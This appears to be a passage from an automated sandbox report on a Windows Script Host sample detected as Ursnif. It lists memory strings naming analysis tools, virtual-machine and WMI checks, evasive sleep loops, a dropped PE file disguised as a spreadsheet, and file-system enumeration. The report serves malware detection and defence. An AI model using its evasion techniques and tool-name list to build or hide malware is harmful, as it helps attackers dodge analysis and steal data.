Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp	Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp	Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp	Binary or memory string: PEID.EXE/O#Z
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp	Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp	Binary or memory string: DUMPCAP.EXE
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp	Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp	Binary or memory string: FORTITRACER.EXEA

Contains capabilities to detect virtual machines

Source: C:\Windows\System32\wscript.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\System32\wscript.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\occurrent.xlsx

Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\wscript.exe TID: 6888

Thread sleep time: -30000s >= -30000s

Jump to behavior

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor

Checks the free space of harddrives

Source: C:\Windows\System32\wscript.exe	File Volume queried: C:\Users\user\AppData\Local FullSizeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation			Jump to behavior

Enumerates the file system

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\Documents\desktop.ini			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Local\Temp			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\Desktop\desktop.ini			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Local			Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files

Source: C:\Windows\System32\wscript.exe

File created: occurrent.xlsx.0.dr

Jump to dropped file

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\bucket.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\bucket.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\bucket.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\bucket.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\bucket.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\bucket.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\bucket.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\bucket.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\bucket.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\bucket.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\bucket.zip VolumeInformation			Jump to behavior

Queries the cryptographic machine GUID

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

AV process strings found (often used to terminate AV products)

Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp	Binary or memory string: procmon.exe
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp	Binary or memory string: tcpview.exe
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp	Binary or memory string: wireshark.exe
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp	Binary or memory string: avz.exe
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp	Binary or memory string: cports.exe
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp	Binary or memory string: lordpe.exe
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp	Binary or memory string: icesword.exe
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp	Binary or memory string: ollydbg.exe
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp	Binary or memory string: regshot.exe

Stealing of Sensitive Information:

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000002.810231625.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.808835058.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.808660831.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.808787211.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.808809218.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.808747913.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.808851885.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.808712663.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.808866758.0000000005038000.00000004.00000040.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000002.810231625.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.808835058.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.808660831.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.808787211.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.808809218.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.808747913.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.808851885.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.808712663.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.808866758.0000000005038000.00000004.00000040.sdmp, type: MEMORY